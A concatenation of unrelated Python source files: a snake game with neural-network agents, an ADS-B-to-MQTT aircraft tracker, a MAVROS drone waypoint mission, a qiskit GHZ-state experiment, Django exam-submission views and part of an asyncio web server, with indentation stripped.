for x in range(self.fieldOfView):
for y in range(self.fieldOfView):
if(map[y * self.fieldOfView + x] == 1):
self.fillTile((100, 255, 100), x, y)
elif(map[y * self.fieldOfView + x] == 0.5):
self.fillTile((100, 100, 255), x, y)
elif(map[y * self.fieldOfView + x] == -1):
self.fillTile((255, 100, 100), x, y)
def update(self):
if self.updateDirection:
self.updateDirection = False
for snake in self.snakeList:
snake.updateDirection(self.direction)
if(not self.maxspeed):
for tile in self._tiles:
if(tile.value < 0):
self.fillTile((200, 50, 50), tile.x, tile.y)
else:
self.fillTile((50, 255, 50), tile.x, tile.y)
for snake in self.snakeList:
snake.updateBody(self._tiles)
if(not self.maxspeed):
snake.drawSnake()
def onSnakeDeath(self):
#pygame.time.delay(20)
delobject = []
reset = False
for i in range(len(self.snakeList)):
if(not self.snakeList[i].alive):
#the game was initially made for players.
#so we need to check if it's an agent, and respawn the snake with a new brain.
self.snakeList[i].updateNNScore()
NN = self.EvN.getNewNN()
if(NN is not None):
snake = SnakeObject(self.centerX, self.centerY, self)
snake.setNN(NN)
self.snakeList[i] = snake
else:
reset = True
delobject.append(i)
if(reset):
#delete in reverse order so earlier deletions do not shift the remaining indices
for i in sorted(delobject, reverse=True):
del self.snakeList[i]
self.reset()
def fillTile(self, color, x, y):
pygame.draw.rect(self.win, color,
(self.tileX * x + 1, self.tileY * y + 1,
self.tileX - 2, self.tileY - 2))
def addTile(self, tile):
self._tiles.append(tile)
def removeTile(self, tile):
self._tiles.remove(tile)
|
adsbclient.py | #!/usr/bin/env python3
#
# Copyright (c) 2015 Johan Kanflo (github.com/kanflo)
#
# Permission is hereby granted, free of charge, to any person obtaining
# a copy of this software and associated documentation files (the
# "Software"), to deal in the Software without restriction, including
# without limitation the rights to use, copy, modify, merge, publish,
# distribute, sublicense, and/or sell copies of the Software, and to
# permit persons to whom the Software is furnished to do so, subject to
# the following conditions:
#
# The above copyright notice and this permission notice shall be
# included in all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,
# EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF
# MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND
# NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE
# LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION
# OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION
# WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.
import socket, select
import paho.mqtt.client as mosquitto
import argparse
import threading
import json
import sbs1
import icao24
import sys, logging
import remotelogger
import datetime, calendar
import signal
import random
import time
import re
import errno
import traceback
gQuitting = False
gPlaneDBs = []
log = logging.getLogger(__name__)
# http://stackoverflow.com/questions/1165352/fast-comparison-between-two-python-dictionary
class DictDiffer(object):
"""
Calculate the difference between two dictionaries as:
(1) items added
(2) items removed
(3) keys same in both but changed values
(4) keys same in both and unchanged values
"""
def __init__(self, current_dict, past_dict):
self.current_dict, self.past_dict = current_dict, past_dict
self.set_current, self.set_past = set(current_dict.keys()), set(past_dict.keys())
self.intersect = self.set_current.intersection(self.set_past)
def added(self):
return self.set_current - self.intersect
def removed(self):
return self.set_past - self.intersect
def changed(self):
return set(o for o in self.intersect if self.past_dict[o] != self.current_dict[o])
def unchanged(self):
return set(o for o in self.intersect if self.past_dict[o] == self.current_dict[o])
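# A minimal illustrative example (plain dicts, not from the original code):
#     d = DictDiffer({"a": 1, "b": 2}, {"b": 3, "c": 4})
#     d.added() == {"a"}; d.removed() == {"c"}; d.changed() == {"b"}; d.unchanged() == set()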
class Observation(object):
def __init__(self, sbs1Message):
log.debug("%s appeared" % sbs1Message.icao24)
self.icao24 = sbs1Message.icao24
self.loggedDate = sbs1Message.loggedDate
self.callsign = sbs1Message.callsign
self.altitude = sbs1Message.altitude
self.groundSpeed = sbs1Message.groundSpeed
self.track = sbs1Message.track
self.lat = sbs1Message.lat
self.lon = sbs1Message.lon
self.verticalRate = sbs1Message.verticalRate
self.operator = None
self.registration = None
self.type = None
self.lost = False
self.updated = True
for db in gPlaneDBs:
plane = db.find(self.icao24)
if plane:
self.registration = plane.registration
self.type = plane.type
self.operator = plane.operator
break
else:
log.debug("icao24 %s not found in any data base" % (self.icao24))
def update(self, sbs1Message):
self.loggedDate = sbs1Message.loggedDate
oldData = dict(self.__dict__)
if sbs1Message.icao24:
self.icao24 = sbs1Message.icao24
if sbs1Message.callsign and self.callsign != sbs1Message.callsign:
self.callsign = sbs1Message.callsign
if sbs1Message.altitude:
self.altitude = sbs1Message.altitude
if sbs1Message.groundSpeed:
self.groundSpeed = sbs1Message.groundSpeed
if sbs1Message.track:
self.track = sbs1Message.track
if sbs1Message.lat:
self.lat = sbs1Message.lat
if sbs1Message.lon:
self.lon = sbs1Message.lon
if sbs1Message.verticalRate:
self.verticalRate = sbs1Message.verticalRate
if not self.verticalRate:
self.verticalRate = 0
for db in gPlaneDBs:
plane = db.find(self.icao24)
if plane:
self.registration = plane.registration
self.type = plane.type
self.operator = plane.operator
break
else:
log.debug("icao24 %s not found in any data base" % (self.icao24))
# Check if observation was updated
newData = dict(self.__dict__)
del oldData["loggedDate"]
del newData["loggedDate"]
d = DictDiffer(oldData, newData)
self.updated = len(d.changed()) > 0
def isPresentable(self):
return self.altitude and self.groundSpeed and self.track and self.lat and self.lon
def dump(self):
log.debug("> %s %s - %s %s (%s), trk:%s spd:%s alt:%s %s, %s" % (self.icao24, self.callsign, self.operator, self.type, self.registration, self.track, self.groundSpeed, self.altitude, self.lat, self.lon))
def dict(self):
d = dict(self.__dict__)
if d["verticalRate"] == None:
d["verticalRate"] = 0;
if "lastAlt" in d:
del d["lastAlt"]
if "lastLat" in d:
del d["lastLat"]
if "lastLon" in d:
del d["lastLon"]
d["loggedDate"] = "%s" % (d["loggedDate"])
return d
def cleanObservations(observations, timeoutSec, mqttc):
global args
removed = []
now = datetime.datetime.now()
for icao24 in observations:
lastSeen = observations[icao24].loggedDate
if lastSeen:
lookDiff = now - lastSeen
diffSeconds = (lookDiff.days * 86400 + lookDiff.seconds)
if diffSeconds > timeoutSec:
removed.append(icao24)
for icao24 in removed:
observations[icao24].lost = True
observations[icao24].updated = True
d = observations[icao24].dict()
d["lost"] = True
mqttc.publish("/adsb/%s/json" % args.radar_name, json.dumps(d), 0, False) # Retain)
del observations[icao24]
log.debug("%s lost", icao24)
return observations
def mqttOnConnect(client, userdata, flags, rc):
log.info("MQTT Connect: %s" % (str(rc)))
def mqttOnDisconnect(mosq, obj, rc):
global gQuitting
log.info("MQTT Disconnect: %s" % (str(rc)))
if not gQuitting:
while not mqttConnect():
time.sleep(10)
log.info("Attempting MQTT reconnect")
log.info("MQTT connected")
def mqttOnMessage(mosq, obj, msg):
try:
data = json.loads(msg.payload)
except Exception as e:
log.error("JSON load failed for '%s'", msg.payload)
proxyCheck(mosq, data)
def mqttOnPublish(mosq, obj, mid):
pass
def mqttOnSubscribe(mosq, obj, mid, granted_qos):
log.debug("Subscribed")
def mqttOnLog(mosq, obj, level, string):
log.debug("log:"+string)
def mqttThread():
global gQuitting
try:
mqttc.loop_forever()
gQuitting = True
log.info("MQTT thread exiting")
gQuitting = True
except Exception as e:
log.error("MQTT thread got exception: %s" % (e))
print(traceback.format_exc())
gQuitting = True
log.info("MQTT disconnect")
mqttc.disconnect();
def mqttConnect():
global args
global mqttc
try:
mqttc = mosquitto.Mosquitto("adsbclient-%d" % (random.randint(0, 65535)))
mqttc.on_message = mqttOnMessage
mqttc.on_connect = mqttOnConnect
mqttc.on_disconnect = mqttOnDisconnect
mqttc.on_publish = mqttOnPublish
mqttc.on_subscribe = mqttOnSubscribe
if args.mqtt_user and args.mqtt_password:
mqttc.username_pw_set(args.mqtt_user, password = args.mqtt_password)
mqttc.connect(args.mqtt_host, args.mqtt_port, 60)
thread = threading.Thread(target = mqttThread)
thread.setDaemon(True)
thread.start()
return True
except socket.error as e:
return False
log.info("MQTT wierdness")
def loggingInit(level, log_host):
log = logging.getLogger(__name__)
# Initialize remote logging
logger = logging.getLogger()
logger.setLevel(level)
if log_host != None:
remotelogger.init(logger = logger, appName = "adsbclient", subSystem = None, host = log_host, level = logging.DEBUG)
if 1:
# Log to stdout
ch = logging.StreamHandler(sys.stdout)
formatter = logging.Formatter('%(asctime)s - %(name)s - %(levelname)s - %(message)s')
ch.setFormatter(formatter)
logger.addHandler(ch)
def signal_handler(signal, frame):
global gQuitting
global mqttc
log.info("Quitting due to ctrl-c")
gQuitting = True
mqttc.disconnect();
sys.exit(0)
def adsbThread():
global gQuitting
global mqttc
global args
sock = None
connWarn = False
observations = {}
socketTimeoutSec = 5
cleanIntervalSec = 5
cleanTimeoutSec = 30 # Clean observations when we have no updates in this time
if args.basestationdb:
gPlaneDBs.append(icao24.PlaneDB(args.basestationdb))
if args.myplanedb:
gPlaneDBs.append(icao24.PlaneDB(args.myplanedb))
lastClean = datetime.datetime.utcnow()
nextClean = datetime.datetime.utcnow() + datetime.timedelta(seconds=cleanIntervalSec)
while 1:
if sock == None:
try:
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.connect((args.dump1090_host, args.dump1090_port))
log.info("ADSB connected")
sock.settimeout(socketTimeoutSec)
connWarn = False
except socket.error as e:
if not connWarn:
logging.critical("Failed to connect to ADSB receiver on %s:%s, retrying : %s" % (args.dump1090_host, args.dump1090_port, e))
connWarn = True
sock = None
time.sleep(10)
else:
if datetime.datetime.utcnow() > nextClean:
observations = cleanObservations(observations, cleanTimeoutSec, mqttc)
lastClean = datetime.datetime.utcnow()
nextClean = datetime.datetime.utcnow() + datetime.timedelta(seconds=cleanIntervalSec)
try:
data = sock.recv(512)
except socket.error as e:
err = e.args[0]
if err == errno.EAGAIN or err == errno.EWOULDBLOCK:
logging.critical("No data available")
print('')
sock = None
time.sleep(10)
else:
logging.critical("Error occured : %s" % (e))
sock = None
time.sleep(10)
else:
m = sbs1.SBS1Message(data)
if m.isValid:
if m.icao24 in observations:
observations[m.icao24].update(m)
else:
observations[m.icao24] = Observation(m)
if observations[m.icao24].isPresentable() and observations[m.icao24].updated:
mqttc.publish("/adsb/%s/json" % args.radar_name, json.dumps(observations[m.icao24].dict()), 0, False) # Retain)
observations[m.icao24].updated = False
observations[m.icao24].dump()
def adsbConnect():
thread = threading.Thread(target = adsbThread)
thread.setDaemon(True)
thread.start()
def main():
global args
parser = argparse.ArgumentParser(description='This is my description')
parser.add_argument('-r', '--radar-name', help="name of radar, used as topic string /adsb/<radar>/json", default='radar')
parser.add_argument('-m', '--mqtt-host', help="MQTT broker hostname", default='127.0.0.1')
parser.add_argument('-p', '--mqtt-port', type=int, help="MQTT broker port number (default 1883)", default=1883)
parser.add_argument('-u', '--mqtt-user', help="MQTT broker user")
parser.add_argument('-a', '--mqtt-password', help="MQTT broker password")
parser.add_argument('-H', '--dump1090-host', help="dump1090 hostname", default='127.0.0.1')
parser.add_argument('-P', '--dump1090-port', type=int, help="dump1090 port number (default 30003)", default=30003)
parser.add_argument('-v', '--verbose', action="store_true", help="Verbose output")
parser.add_argument('-bdb', '--basestationdb', help="BaseStation SQLite DB (download from http://planebase.biz/bstnsqb)")
parser.add_argument('-mdb', '--myplanedb', help="Your own SQLite DB with the same structure as BaseStation.sqb where you can add planes missing from BaseStation db")
parser.add_argument('-l', '--logger', dest='log_host', help="Remote log host")
args = parser.parse_args()
signal.signal(signal.SIGINT, signal_handler)
if args.verbose:
loggingInit(logging.DEBUG, args.log_host)
else:
loggingInit(logging.INFO, args.log_host)
mqttConnect()
adsbConnect()
numThreads = threading.active_count()
while numThreads == threading.active_count():
time.sleep(0.1)
log.critical("Exiting")
# Ye ol main
main()
|
navigation.py | import rospy
import glob
import json
import math
import os
import px4tools
import sys
import time
import actionlib
import roslaunch
import numpy as np
from mavros import mavlink
from mavros import action_server
from mavros_msgs.msg import Mavlink, Waypoint, WaypointReached, GlobalPositionTarget, State, TakeoffAction, TakeoffGoal, LandAction, LandGoal, WaypointsAction, WaypointsGoal, HomePosition
from mavros_msgs.srv import CommandBool, SetMode, CommandTOL, WaypointPush, WaypointClear, CommandHome
from sensor_msgs.msg import NavSatFix
from geometry_msgs.msg import PoseStamped
from mavros_test_common import MavrosTestCommon
from pymavlink import mavutil
from threading import Thread
# actionlib (imported above) brings in the SimpleActionClient
class offboard():
def state_callback(self, data):
self.state = data
def wp_reached_callback(self, data):
self.wp_reached = data
def home_pos_callback(self, data):
self.home_pos = data
#print(self.home_pos.geo)
def global_pos_callback(self, data):
self.global_pos = data
def __init__(self):
rospy.init_node('guidance_node', anonymous=True)
state_sub = rospy.Subscriber('mavros/state', State, self.state_callback)
self.state = State()
#PUBLISHERS
local_pos_pub = rospy.Publisher('mavros/setpoint_position/local', PoseStamped, queue_size=10)
#global_pos_pub = rospy.Publisher('mavros/setpoint_position/global', GlobalPositionTarget, queue_size=10)
local_pos_sub = rospy.Subscriber('/mavros/global_position/global', NavSatFix, self.global_pos_callback)
home_pos_sub = rospy.Subscriber('/mavros/home_position/home', HomePosition, self.home_pos_callback)
#ACTIONS
#init actionlib servers
server = Thread(target=action_server.ActionServer)
server.setDaemon(True)
server.start()
takeoff_client = actionlib.SimpleActionClient('takeoff', TakeoffAction)
land_client = actionlib.SimpleActionClient('land', LandAction)
waypoints_client = actionlib.SimpleActionClient('waypoints', WaypointsAction)
# need to simulate heartbeat to prevent datalink loss detection
hb_mav_msg = mavutil.mavlink.MAVLink_heartbeat_message(mavutil.mavlink.MAV_TYPE_GCS, 0, 0, 0, 0, 0)
hb_mav_msg.pack(mavutil.mavlink.MAVLink('', 2, 1))
hb_ros_msg = mavlink.convert_to_rosmsg(hb_mav_msg)
hb_thread = Thread(target=self.send_heartbeat, args=(hb_ros_msg,))
hb_thread.setDaemon(True)
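# A hedged sketch (assumption, not in the original script): send_heartbeat publishes on
# self.mavlink_pub, which is never created here, so in a complete setup one would add
# something like:
#     self.mavlink_pub = rospy.Publisher('mavlink/to', Mavlink, queue_size=1)
#     hb_thread.start()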
#PREFLIGHT CHECK
rate = rospy.Rate(30)
while (not self.state.connected):
print('Waiting on Connection')
rate.sleep()
print('Connected')
time.sleep(5)
goal = TakeoffGoal()
goal.height = 22
print('Actionlib started')
takeoff_client.send_goal(goal)
takeoff_client.wait_for_result()
#1: Hold Hold time. (ignored by fixed wing, time to stay at waypoint for rotary wing) min:0 s
#2: Accept Radius Acceptance radius (if the sphere with this radius is hit, the waypoint counts as reached) min:0 m
#3: Pass Radius 0 to pass through the WP, if > 0 radius to pass by WP. Positive value for clockwise orbit, negative value for counter-clockwise orbit.
#4: Yaw Desired yaw angle (deg) at waypoint (rotary wing). NaN to use the current system yaw heading mode (e.g. yaw towards next waypoint, yaw to home, etc.).
#5: Latitude Latitude
#6: Longitude Longitude
#7: Altitude Altitude
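# Illustrative mapping of those params onto the mavros Waypoint message used below
# (a sketch; the hold/radius/yaw values are assumptions, this script only sets command,
# x_lat, y_long, z_alt and autocontinue):
#     wp.command = 16            # MAV_CMD_NAV_WAYPOINT
#     wp.param1 = 0.0            # hold time [s]
#     wp.param2 = 5.0            # acceptance radius [m]
#     wp.param3 = 0.0            # pass through the waypoint
#     wp.param4 = float('nan')   # yaw: keep current heading mode
#     wp.x_lat, wp.y_long, wp.z_alt = latitude, longitude, altitude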
wps = []
wp1 = Waypoint()
wp2 = Waypoint()
wp3 = Waypoint()
wp4 = Waypoint()
wp5 = Waypoint()
wp6 = Waypoint()
wp7 = Waypoint()
wp8 = Waypoint()
wp9 = Waypoint()
wp10 = Waypoint()
wp11 = Waypoint()
wp12 = Waypoint()
wp1.command = 16
#wp1.param4 = np.nan
wp1.x_lat = 40.00482126
wp1.y_long = 100.0100724
wp1.z_alt = 22
wp1.autocontinue = True
wp2.command = 16
#wp2.param4 = np.nan
wp2.x_lat = 40.00422467
wp2.y_long = 100.0122255
wp2.z_alt = 22
wp2.autocontinue = True
wp3.command = 16
#wp3.param4 = np.nan
wp3.x_lat = 40.00443838
wp3.y_long = 100.0123931
wp3.z_alt = 22
wp3.autocontinue = True
wp4.command = 16
#wp4.param4 = np.nan
wp4.x_lat = 40.00515832
wp4.y_long = 100.0103007
wp4.z_alt = 22
wp4.autocontinue = True
wp5.command = 16
#wp5.param4 = np.nan
wp5.x_lat = 40.00549537
wp5.y_long = 100.010529
wp5.z_alt = 22
wp5.autocontinue = True
wp6.command = 16
#wp6.param4 = np.nan
wp6.x_lat = 40.0046521
wp6.y_long = 100.0125607
wp6.z_alt = 22
wp6.autocontinue = True
wp7.command = 16
#wp7.param4 = np.nan
wp7.x_lat = 40.00489078
wp7.y_long = 100.0127564
wp7.z_alt = 22
wp7.autocontinue = True
wp8.command = 16
#wp8.param4 = np.nan
wp8.x_lat = 40.00573685
wp8.y_long = 100.0106538
wp8.z_alt = 22
wp8.autocontinue = True
wp9.command = 16
#wp9.param4 = np.nan
wp9.x_lat = 40.00597832
wp9.y_long = 100.0107787
wp9.z_alt = 22
wp9.autocontinue = True
wp10.command = 16
#wp10.param4 = np.nan
wp10.x_lat = 40.00512946
wp10.y_long = 100.0129521
wp10.z_alt = 22
wp10.autocontinue = True
wp11.command = 16
#wp11.param4 = np.nan
wp11.x_lat = 40.00536815
wp11.y_long = 100.0131477
wp11.z_alt = 22
wp11.autocontinue = True
wp12.command = 16
#wp12.param4 = np.nan
wp12.x_lat = 40.00621979
wp12.y_long = 100.0109035
wp12.z_alt = 22
wp12.autocontinue = True
goal = WaypointsGoal()
goal.waypoints.append(wp1)
goal.waypoints.append(wp2)
goal.waypoints.append(wp3)
goal.waypoints.append(wp4)
goal.waypoints.append(wp5)
goal.waypoints.append(wp6)
goal.waypoints.append(wp7)
goal.waypoints.append(wp8)
goal.waypoints.append(wp9)
goal.waypoints.append(wp10)
goal.waypoints.append(wp11)
goal.waypoints.append(wp12)
print(goal)
waypoints_client.send_goal(goal)
waypoints_client.wait_for_result(rospy.Duration.from_sec(800.0))
time.sleep(5)
goal = LandGoal()
goal.x_lat = self.home_pos.geo.latitude
goal.y_long = self.home_pos.geo.longitude
goal.z_alt = 0.0
print('Actionlib started')
land_client.send_goal(goal)
land_client.wait_for_result(rospy.Duration.from_sec(30.0))
sys.exit()
# Heartbeat must be sent to px4 at 2Hz or else auto disconnect
def send_heartbeat(self, hb_ros_msg):
rate = rospy.Rate(2) # Hz
while not rospy.is_shutdown():
self.mavlink_pub.publish(hb_ros_msg)
try: # prevent garbage in console output when thread is killed
rate.sleep()
except rospy.ROSInterruptException:
pass
if __name__ == '__main__':
offboard()
|
compare_num_layer_ghz_multiprocessing_adam.py | import qiskit
import numpy as np
import sys
import multiprocessing
sys.path.insert(1, '../')
import qtm.base, qtm.constant, qtm.onequbit, qtm.nqubit, qtm.fubini_study, qtm.encoding
import importlib
importlib.reload(qtm.base)
importlib.reload(qtm.constant)
importlib.reload(qtm.onequbit)
importlib.reload(qtm.nqubit)
# Init parameters
# For arbitrary initial state
def run_ghz(num_layers, num_qubits):
# GHZ
theta = np.pi/3
thetas = np.ones(num_qubits*num_layers*5)
qc = qiskit.QuantumCircuit(num_qubits, num_qubits)
loss_values_ghz = []
thetass_ghz = []
for i in range(0, 400):
# the Fubini-Study metric for the GHZ-checker circuit is the same as for the plain linear state
if i % 20 == 0:
print('GHZ (' + str(num_layers) + ' layer): ', i)
# G = qtm.fubini_study.calculate_linear_state(qc.copy(), thetas, num_layers)
grad_loss = qtm.base.grad_loss(
qc,
qtm.nqubit.create_GHZchecker_linear,
thetas, num_layers = num_layers, theta = theta)
# grad1 = np.real(np.linalg.inv(G) @ grad_loss)
if i == 0:
m, v = list(np.zeros(thetas.shape[0])), list(np.zeros(thetas.shape[0]))
thetas = qtm.base.adam(thetas, m, v, i, grad_loss)
qc_copy = qtm.nqubit.create_GHZchecker_linear(qc.copy(), thetas, num_layers, theta)
loss = qtm.base.loss_basis(qtm.base.measure(qc_copy, list(range(qc_copy.num_qubits))))
loss_values_ghz.append(loss)
thetass_ghz.append(thetas)
traces_ghz, fidelities_ghz = [], []
for thetas in thetass_ghz:
# Get |psi> = U_gen|000...>
qc = qiskit.QuantumCircuit(num_qubits, num_qubits)
qc = qtm.nqubit.create_linear_state(qc, thetas, num_layers = num_layers)
psi , rho_psi = qtm.base.extract_state(qc)
# Get |psi~> = U_target|000...>
qc1 = qiskit.QuantumCircuit(num_qubits, num_qubits)
qc1 = qtm.nqubit.create_ghz_state(qc1, theta = theta)
psi_hat , rho_psi_hat = qtm.base.extract_state(qc1)
# Calculate the metrics
trace, fidelity = qtm.base.get_metrics(psi, psi_hat)
traces_ghz.append(trace)
fidelities_ghz.append(fidelity)
# Plot loss value in 100 steps
print('Writing ...')
np.savetxt("../../experiments/linear_ansatz_15layer_adam/" + str(num_layers) + "/loss_values_ghz.csv", loss_values_ghz, delimiter=",")
np.savetxt("../../experiments/linear_ansatz_15layer_adam/" + str(num_layers) + "/thetass_ghz.csv", thetass_ghz, delimiter=",")
np.savetxt("../../experiments/linear_ansatz_15layer_adam/" + str(num_layers) + "/traces_ghz.csv", traces_ghz, delimiter=",")
np.savetxt("../../experiments/linear_ansatz_15layer_adam/" + str(num_layers) + "/fidelities_ghz.csv", fidelities_ghz, delimiter=",")
if __name__ == "__main__":
# creating thread
num_qubits = 5
num_layers = [1,2,3,4,5]
t_ghz = []
for i in num_layers:
t_ghz.append(multiprocessing.Process(target = run_ghz, args=(i, num_qubits)))
for i in range(0, len(num_layers)):
t_ghz[i].start()
for i in range(0, len(num_layers)):
t_ghz[i].join()
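# One process per layer count; join() blocks until every run has written its CSVs.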
print("Done!") |
lecturer.py | from django.shortcuts import render, get_object_or_404
from django.http import HttpResponseRedirect
from django.contrib import messages
from django.contrib.auth.decorators import user_passes_test
from django.core.paginator import Paginator
from django.conf import settings
from django.core.mail import EmailMessage
from django.template.loader import render_to_string
from threading import Thread
from main_app.sender import *
from main_app.forms.lecturer import *
from main_app.models import Submission, Section
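# Every view below is gated on the logged-in user owning at least one
# Section via their instructor record (user_passes_test).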
@user_passes_test(lambda u: u.Ins_ID.section_set.exists())
def home_view(request):
return render(request, 'lecturer/home.html')
############################################################# Start Functions #############################################################
@user_passes_test(lambda u: u.Ins_ID.section_set.exists())
def submit_exam_view(request):
sections = Section.objects.filter(
Ins_ID=request.user.Ins_ID,
).order_by('E_ID__Date')
paginator = Paginator(sections, 10)
section_pages = request.GET.get('page')
sections = paginator.get_page(section_pages)
context = {
'sections': sections,
}
return render(request, 'lecturer/SubmitExam.html', context)
@user_passes_test(lambda u: u.Ins_ID.section_set.exists())
def redirect_submit_exam(request, pk):
section = get_object_or_404(Section, pk=pk, Ins_ID=request.user.Ins_ID)
form = SubmitExamForm(request.POST)
request.session['typesOfCalc'] = None
request.session['notes'] = None
context = {
'section': section,
'form': form,
}
if request.method == 'POST':
if form.is_valid():
request.session['noModels'] = form.cleaned_data['noModels']
request.session['noOfPapers'] = form.cleaned_data['noOfPapers']
request.session['noOfDN'] = form.cleaned_data['noOfDN']
request.session['typesOfCalc'] = form.cleaned_data['typesOfCalc']
request.session['notes'] = form.cleaned_data['notes']
submission = Submission(
Ins_ID = request.user.Ins_ID,
ID = section,
)
submission.save()
return HttpResponseRedirect(f'/lecturer/SubmitExam/Form/{pk}')
return render(request, 'lecturer/cud/RedirectSubmitExam.html', context)
@user_passes_test(lambda u: u.Ins_ID.section_set.exists())
def submit_exam_form(request, pk):
noModels = request.session.get('noModels')
noOfPapers = request.session.get('noOfPapers')
typesOfCalc = request.session.get('typesOfCalc')
noOfDN = request.session.get('noOfDN')
notes = request.session.get('notes')
section = get_object_or_404(Section, pk=pk, Ins_ID=request.user.Ins_ID)
context = {
'section': section,
'noModels': noModels,
'noOfPapers': noOfPapers,
'typesOfCalc': typesOfCalc,
'noOfDN': noOfDN,
'notes': notes,
}
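# Render the cover form to a string so it can be emailed as a PDF from a
# background thread; pdf_mail is assumed to come from main_app.sender's
# star import above.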
html = render_to_string('lecturer/forms/CoverForm.html', context)
thread = Thread(target=pdf_mail, args=(html, 'coverform', [request.user.Ins_ID.Email]))
thread.start()
return render(request, 'lecturer/forms/CoverForm.html', context)
@user_passes_test(lambda u: u.Ins_ID.section_set.exists())
def confirm_delivering_view(request):
submitted = Submission.objects.filter(
Ins_ID=request.user.Ins_ID,
).order_by('D_Status')
paginator = Paginator(submitted, 10)
submitted_page = request.GET.get('page')
submitted = paginator.get_page(submitted_page)
context = {
'submitted': submitted,
}
return render(request, 'lecturer/ConfirmDelivering.html', context)
@user_passes_test(lambda u: u.Ins_ID.section_set.exists())
def confirm_delivering(request, pk):
submission = get_object_or_404(
Submission, pk=pk, Ins_ID=request.user.Ins_ID)
context = {
'submission': submission,
}
if request.method == 'POST':
submission.D_Status = True
submission.save()
message = """
Exam : ({}) has been confirmed delivering by: ({})
Examination Control Committee""".format(submission.ID.CCourse.CoName, submission.Ins_ID)
mail_thread = Thread(target=send_mail, args=(message, [submission.Member_ID.Email]))
mail_thread.start()
# sms_thread = Thread(target=send_sms, args=(message,))
# sms_thread.start()
messages.success(request, 'Successfully confirmed delivering')
return HttpResponseRedirect('/lecturer/ConfirmDelivering')
return render(request, 'lecturer/cud/ConfirmDeliver.html', context)
@user_passes_test(lambda u: u.Ins_ID.section_set.exists())
def remove_submission(request, pk):
submitted = get_object_or_404(
Submission, pk=pk, Ins_ID=request.user.Ins_ID)
context = {
'submitted': submitted,
}
if request.method == 'POST':
if not submitted.S_Status:
submitted.delete()
messages.success(request, 'Successfully removed submission')
else:
messages.error(request, 'You cannot remove this submission!')
return HttpResponseRedirect('/lecturer/ConfirmDelivering')
return render(request, 'lecturer/cud/RemoveSubmission.html', context)
############################################################# End Functions #############################################################
|
server.py | import asyncio
import logging
import os
import uvloop
from functools import partial
from inspect import isawaitable
from multiprocessing import Process
from ssl import create_default_context, Purpose
from signal import (
SIGTERM, SIGINT,
signal as signal_func,
Signals
)
from socket import (
socket,
SOL_SOCKET,
SO_REUSEADDR,
)
from mach9.http import HttpProtocol
from mach9.signal import Signal
from mach9.timer import update_current_time
class Server:
def __init__(self, app):
self.app = app
self.request_handler = app
self.signal = Signal()
self.log = app.log
self.log_config = app.log_config
self.listeners = app.listeners
self.debug = app.debug
self.netlog = app.netlog
self.request_timeout = app.request_timeout
self.request_max_size = app.request_max_size
self.keep_alive = app.keep_alive
def get_server_setting(self, protocol, host='127.0.0.1', port=8000,
debug=False, ssl=None, sock=None, workers=1,
loop=None, backlog=100, has_log=True):
'''Helper function used by `run`.'''
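# `ssl` may be an SSLContext or a dict of cert/key paths; dicts are
# converted below. Illustrative call (paths are hypothetical):
#   server.get_server_setting(HttpProtocol,
#       ssl={'cert': '/etc/ssl/fullchain.pem', 'key': '/etc/ssl/privkey.pem'})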
if isinstance(ssl, dict):
# try common aliases
cert = ssl.get('cert') or ssl.get('certificate')
key = ssl.get('key') or ssl.get('keyfile')
if cert is None or key is None:
raise ValueError('SSLContext or certificate and key required.')
context = create_default_context(purpose=Purpose.CLIENT_AUTH)
context.load_cert_chain(cert, keyfile=key)
ssl = context
server_settings = {
'protocol': protocol,
'request_handler': self.request_handler,
'log': self.log,
'netlog': self.netlog,
'host': host,
'port': port,
'sock': sock,
'ssl': ssl,
'signal': self.signal,
'debug': debug,
'request_timeout': self.request_timeout,
'request_max_size': self.request_max_size,
'keep_alive': self.keep_alive,
'loop': loop,
'backlog': backlog,
'has_log': has_log
}
for event_name, settings_name, reverse in (
('before_server_start', 'before_start', False),
('after_server_start', 'after_start', False),
('before_server_stop', 'before_stop', True),
('after_server_stop', 'after_stop', True),
):
listeners = self.listeners[event_name].copy()
if reverse:
listeners.reverse()
# Prepend mach9 to the arguments when listeners are triggered
listeners = [partial(listener, self.app) for listener in listeners]
server_settings[settings_name] = listeners
if debug:
self.log.setLevel(logging.DEBUG)
# Serve
if host and port:
proto = 'http'
if ssl is not None:
proto = 'https'
self.log.info('Goin\' Fast @ {}://{}:{}'.format(proto, host, port))
return server_settings
def run(self, host='127.0.0.1', port=8000, ssl=None,
sock=None, workers=1, backlog=100, protocol=None):
protocol = protocol or HttpProtocol
server_settings = self.get_server_setting(
protocol, host=host, port=port, debug=self.debug, ssl=ssl,
sock=sock, workers=workers, backlog=backlog,
has_log=self.log_config is not None)
try:
if workers == 1:
self.serve(**server_settings)
else:
self.serve_multiple(server_settings, workers)
except Exception:
self.log.exception(
'Experienced exception while trying to serve')
self.log.info('Server Stopped')
def trigger_events(self, events, loop):
"""Trigger event callbacks (functions or async)
:param events: one or more sync or async functions to execute
:param loop: event loop
"""
for event in events:
result = event(loop)
if isawaitable(result):
loop.run_until_complete(result)
def serve(self, host, port, request_handler,
before_start=None,
after_start=None, before_stop=None, after_stop=None, debug=False,
request_timeout=60, ssl=None, sock=None, request_max_size=None,
reuse_port=False, loop=None, protocol=None, backlog=100,
connections=None, signal=None, has_log=True, keep_alive=True,
log=None, netlog=None):
self.loop = loop = uvloop.new_event_loop()
asyncio.set_event_loop(loop)
if debug:
loop.set_debug(debug)
self.trigger_events(before_start, loop)
connections = connections if connections is not None else set()
server = partial(
protocol,
loop=loop,
connections=connections,
signal=signal,
request_handler=request_handler,
request_timeout=request_timeout,
request_max_size=request_max_size,
has_log=has_log,
keep_alive=keep_alive,
log=log,
netlog=netlog
)
server_coroutine = loop.create_server(
server,
host,
port,
ssl=ssl,
reuse_port=reuse_port,
sock=sock,
backlog=backlog
)
# Instead of pulling time at the end of every request,
# pull it once per minute
loop.call_soon(partial(update_current_time, loop))
try:
http_server = loop.run_until_complete(server_coroutine)
except Exception:
log.exception("Unable to start server")
return
